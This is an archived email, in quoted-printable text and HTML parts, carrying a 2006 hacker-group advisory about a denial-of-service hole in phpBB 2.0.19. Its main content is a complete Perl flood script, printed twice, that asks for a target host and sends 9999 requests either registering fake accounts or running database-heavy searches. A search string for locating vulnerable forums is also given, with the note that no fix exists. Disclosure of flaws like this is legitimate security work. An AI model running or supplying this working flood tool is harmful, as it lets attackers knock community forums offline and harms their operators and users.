------=_Part_22785_23101671.1138200225311 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline ------------------------------------------------------ HYSA-2006-001 h4cky0u.org Advisory 010 ------------------------------------------------------ Date - Wed Jan 25 2006 TITLE: =3D=3D=3D=3D=3D=3D phpBB 2.0.19 search.php and profile.php DOS Vulnerability SEVERITY: =3D=3D=3D=3D=3D=3D=3D=3D=3D High SOFTWARE: =3D=3D=3D=3D=3D=3D=3D=3D=3D phpBB 2.0.19 and prior INFO: =3D=3D=3D=3D=3D phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites. Support Website : http://www.phpbb.com BUG DESCRIPTION: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at - http://h4cky0u.org/viewtopic.php?t=3D637 This one affected only versions uptill phpBB 2.0.15. The exploit code has been recoded which affects the latest version too. The bug resides in the following two scripts- profile.php << By registering as many users as you can. search.php << By searching in a way that the db cannot understand. Proof Of Concept Code: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D #!/usr/bin/perl ####################################### ## Recoded by: mix2mix and Elioni of http://ahg-khf.org ## And h4cky0u Security Forums (http://h4cky0u.org) ## Name: phpBBDoSReloaded ## Original Author: HaCkZaTaN of Neo Security Team ## Tested on phpBB 2.0.19 and earlier versions ## Ported to perl by g30rg3_x ## Date: 25/01/06 ####################################### use IO::Socket; ## Initialized X $x =3D 0; print q( phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN Recoded by Albanian Hackers Group & h4cky0u Security Forums=09 ); print q(Host |without-> http://www.| ); $host =3D ; chop ($host); print q(Path |example-> /phpBB2/ or /| ); $pth =3D ; chop ($pth); print q(Flood Type |1 =3D If Visual Confirmation is disabled, 2 =3D If Visual Confirmation is enabled| ); $type =3D ; chop ($type); ## Tipi p=EBr regjistrim if($type =3D=3D 1){ ## User Loop for 9999 loops (enough for Flood xDDDD) while($x !=3D 9999) { ## Antari q=EB regjistrohet automatikisht=EB "X" $uname =3D "username=3DAHG__" . "$x"; ## Emaili q=EB regjistrohet ne baz=EBn "X" $umail =3D "&email=3DAHG__" . "$x"; $postit =3D "$uname"."$umail"."%40ahg-crew.org&new_password=3D0123456&passw= ord_confirm=3D0123456&icq=3D&aim=3DN%2FA&msn=3D&yim=3D&website=3D&location= =3D&occupation=3D&interests=3D&signature=3D&viewemail=3D0&hideonline=3D0&no= tifyreply=3D0¬ifypm=3D1&popup_pm=3D1&attachsig=3D1&allowbbcode=3D1&allow= html=3D0&allowsmilies=3D1&language=3Denglish&style=3D2&timezone=3D0&datefor= mat=3DD+M+d%2C+Y+g%3Ai+a&mode=3Dregister&agreed=3Dtrue&coppa=3D0&submit=3DS= ubmit"; $lrg =3D length $postit; my $sock =3D new IO::Socket::INET ( PeerAddr =3D> "$host", PeerPort =3D> "80", Proto =3D> "tcp", ); die "\nNuk mundem te lidhemi me hostin sepse =EBsht dosirat ose nuk egziston: $!\n" unless $sock; ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Foru= ms print $sock "POST $pth"."profile.php HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## Print a "+" for every loop syswrite STDOUT, "+"; $x++; } ## Tipi 2-sh=EB p=EBr K=EBrkim(Flood) } elsif ($type =3D=3D 2){ while($x !=3D 9999) { ## Final Search String to Send $postit =3D "search_keywords=3DAlbanian+Hackers+Group+Proof+of+Concept+$x+&= search_terms=3Dany&search_author=3D&search_forum=3D-1&search_time=3D0&searc= h_fields=3Dmsgonly&search_cat=3D-1&sort_by=3D0&sort_dir=3DASC&show_results= =3Dposts&return_chars=3D200"; ## Posit Length $lrg =3D length $postit; ## Connect Socket with Variables Provided By User my $sock =3D new IO::Socket::INET ( PeerAddr =3D> "$host", PeerPort =3D> "80", Proto =3D> "tcp", ); die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock; ## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums print $sock "POST $pth"."search.php?mode=3Dresults HTTP/1.1\n"; print $sock "Host: $host\n"; print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=3D0.9,text/plain= ;q=3D0.8,image/png,*/*;q=3D0.5\n"; print $sock "Referer: $host\n"; print $sock "Accept-Language: en-us\n"; print $sock "Content-Type: application/x-www-form-urlencoded\n"; print $sock "Accept-Encoding: gzip, deflate\n"; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; print $sock "Connection: Keep-Alive\n"; print $sock "Cache-Control: no-cache\n"; print $sock "Content-Length: $lrg\n\n"; print $sock "$postit\n"; close($sock); ## Print a "+" for every loop syswrite STDOUT, "+"; ## Increment X in One for every Loop $x++; } }else{ ## STF??? Qfar=EB keni Shtypur die "Mund=EBsia nuk Lejohet +_-???\n"; } FIX: =3D=3D=3D=3D No fix available as of date. GOOGLEDORK: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D "Powered by phpBB" CREDITS: =3D=3D=3D=3D=3D=3D=3D=3D - This vulnerability was discovered and researched by HaCkZaTaN of NeoSecurityteam. - Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest release of the script - Web : http://ahg-khf.org mail : webmaster at ahg-khf dot org - Co Researcher - h4cky0u of h4cky0u Security Forums. mail : h4cky0u at gmail dot com web : http://www.h4cky0u.org ORIGINAL ADVISORY: =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt -- http://www.h4cky0u.org (In)Security at its best... ------=_Part_22785_23101671.1138200225311 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline

------------------------------------------------------
      HYSA-2=
006-001 h4cky0u.org Advisory 010
----=
--------------------------------------------------
Date - Wed Jan 25 200=
6



TITLE:
=3D=3D=3D=3D=3D=3D

phpBB 2.0.19 search.php and=
 profile.php DOS Vulnerability


SEVERITY:
=3D=3D=3D=3D=3D=3D=
=3D=3D=3D

High


SOFTWARE:
=3D=3D=3D=3D=3D=3D=3D=3D=3D
phpBB 2.0.19 and prior


INFO:

=3D=3D=3D=3D=3D

phpBB is a high powered, fully scalable, and highly =
customizable 
Open Source bulletin board package. phpBB has a user-frien=
dly 
interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your=20

choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.

Supp=
ort Website : http://www.phpbb.com



BUG DESCRIPTION:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D

The bug was originally found by HaCkZaTaN of NeoSecurityteam. Th=
e original exploit code can be found at -

http://h4cky0u.org/viewtopic.php?t=3D637


This one affected only versions uptill phpBB 2.0.15. The exploi=
t code has been recoded which affects the latest version too. The bug resid=
es in the following two scripts-

profile.php << By registering=
 as many users as you can.=20

search.php  << By searching in a way that the db cannot understan=
d.


Proof Of Concept Code:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

#!/usr/bin/perl 
##############=
######################### 
##   Recoded by: mix2mix and Elioni of=20
http://ahg-khf.org
##   And h4cky0u S=
ecurity Forums (http://h4cky0u.org) 
=
##   Name: phpBBDoSReloaded
##   Original Author: HaCkZaTaN of Neo Secur=
ity Team=20

##   Tested on phpBB 2.0.19 and earlier versions
##   Ported to perl=
 by g30rg3_x
##   Date: 25/01/06
####################################=
### 
use IO::Socket; 

## Initialized X 
$x =3D 0; 

prin=
t q(

  phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
  Recoded=
 by Albanian Hackers Group &
  h4cky0u Security Forums=09

); =

print q(Host |without-> http://www.| );=
=20

$host =3D <STDIN>; 
chop ($host); 

print q(Path |exampl=
e-> /phpBB2/ or /| ); 
$pth =3D <STDIN>; 
chop ($pth); 
<=
br>print q(Flood Type |1 =3D If Visual Confirmation is disabled, 2 =3D If V=
isual Confirmation is enabled| );=20

$type =3D <STDIN>; 
chop ($type); 

## Tipi p=EBr regjis=
trim 
if($type =3D=3D 1){ 

## User Loop for 9999 loops (enough fo=
r Flood xDDDD) 
while($x !=3D 9999) 
{ 

## Antari q=EB regjist=
rohet automatikisht=EB "X"=20

$uname =3D "username=3DAHG__" . "$x"; 

## Em=
aili q=EB regjistrohet ne baz=EBn "X" 
$umail =3D "&e=
mail=3DAHG__" . "$x"; 

$postit =3D "$uname"=
."$umail"."%40ahg-
crew.org&new_password=3D0123456&password_confirm=3D0123456&icq=
=3D&aim=3DN%2FA&msn=3D&yim=3D&website=3D&location=3D&am=
p;occupation=3D&interests=3D&signature=3D&viewemail=3D0&hid=
eonline=3D0&notifyreply=3D0&notifypm=3D1&popup_pm=3D1&attac=
hsig=3D1&allowbbcode=3D1&allowhtml=3D0&allowsmilies=3D1&lan=
guage=3Denglish&style=3D2&timezone=3D0&dateformat=3DD+M+d%2C+Y+=
g%3Ai+a&mode=3Dregister&agreed=3Dtrue&coppa=3D0&submit=3DSu=
bmit
"; 

$lrg =3D length $postit; 

my $sock =3D new IO::Socke=
t::INET ( 
                                 PeerAddr =3D> "$host=
", 
                                 PeerPort =3D> "80"=
;, 

                                 Proto =3D> "tcp", 
       =
                         ); 
die "\nNuk mundem te lidhemi me hostin=
 sepse =EBsht dosirat ose nuk egziston: $!\n" unless $sock; 

##=
 Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums=
=20

print $sock "POST $pth"."profile.php HTTP/1.1\n"; <=
br>print $sock "Host: $host\n"; 
print $sock "Accept: ima=
ge/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-f=
lash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/=
msword, */*\n";=20

print $sock "Referer: $host\n"; 
print $sock "Accept-=
Language: en-us\n"; 
print $sock "Content-Type: application/x-=
www-form-urlencoded\n"; 
print $sock "Accept-Encoding: gzip, d=
eflate\n";=20

print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv=
:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
print $sock "Connect=
ion: Keep-Alive\n"; 
print $sock "Cache-Control: no-cache\n&qu=
ot;;=20

print $sock "Content-Length: $lrg\n\n"; 
print $sock "=
;$postit\n"; 
close($sock); 

## Print a "+" for ev=
ery loop 
syswrite STDOUT, "+"; 

$x++; 
} 


## Tipi 2-sh=EB p=EBr K=EBrkim(Flood) 
} 
elsif ($type =3D=3D 2){ 
while($x !=3D 9999) 
{ 
## Final Search String to Send 
$post=
it =3D "search_keywords=3DAlbanian+Hackers+Group+Proof+of+Concept+$x+&=
amp;search_terms=3Dany&search_author=3D&search_forum=3D-1&searc=
h_time=3D0&search_fields=3Dmsgonly&search_cat=3D-1&sort_by=3D0&=
amp;sort_dir=3DASC&show_results=3Dposts&return_chars=3D200";=
=20


## Posit Length 
$lrg =3D length $postit; 

## Connect Soc=
ket with Variables Provided By User 
my $sock =3D new IO::Socket::INET (=
 
                                 PeerAddr =3D> "$host", <=
br>
                                 PeerPort =3D> "80", 
     =
                            Proto =3D> "tcp", 
            =
                    ); 
die "\nThe Socket Can't Connect To The Desi=
red Host or the Host is MayBe DoSed: $!\n" unless $sock;=20


## Sending Truth Socket The HTTP Commands For Send A BD Search Into=
 phpBB Forums 
print $sock "POST $pth"."search.php?mode=
=3Dresults HTTP/1.1\n"; 
print $sock "Host: $host\n"; 
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,te=
xt/html;q=3D0.9,text/plain;q=3D0.8,image/png,*/*;q=3D0.5\n"; 
print=
 $sock "Referer: $host\n"; 
print $sock "Accept-Language:=
 en-us\n";=20

print $sock "Content-Type: application/x-www-form-urlencoded\n&quo=
t;; 
print $sock "Accept-Encoding: gzip, deflate\n"; 
print=
 $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8
) Gecko/20050511 Firefox/1.0.4\n"; 
print $sock "Connection: K=
eep-Alive\n"; 
print $sock "Cache-Control: no-cache\n"; <=
br>print $sock "Content-Length: $lrg\n\n"; 
print $sock "=
$postit\n";=20

close($sock); 

## Print a "+" for every loop 
syswr=
ite STDOUT, "+"; 

## Increment X in One for every Loop $x++; 
} 
}else{ 
## STF??? Qfar=EB keni Shtypur 
   die "=
;Mund=EBsia nuk Lejohet +_-???\n";=20

}


FIX:
=3D=3D=3D=3D

No fix available as of date.

GOOGLEDORK:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

"Pow=
ered by phpBB" 


CREDITS:
=3D=3D=3D=3D=3D=3D=3D=3D
- This vulnerability was discovered and researched by HaCkZaTaN of NeoSecu=
rityteam.



- Exploit recoded by mix2mix of [AHG-KHF] Security Team for the=
 latest release of the script -

Web : http://ahg-khf.org

mail : webmaster at ahg-khf dot org



- Co Researcher -

h4cky0u of h4cky0u Security Forums.

mai=
l : h4cky0u at gmail dot com

web : http://www.h4cky0u.org


ORIGINAL ADVISORY:
=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D


http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt


-- 
http://www.h4cky0u.org
(In=
)Security at its best...

------=_Part_22785_23101671.1138200225311--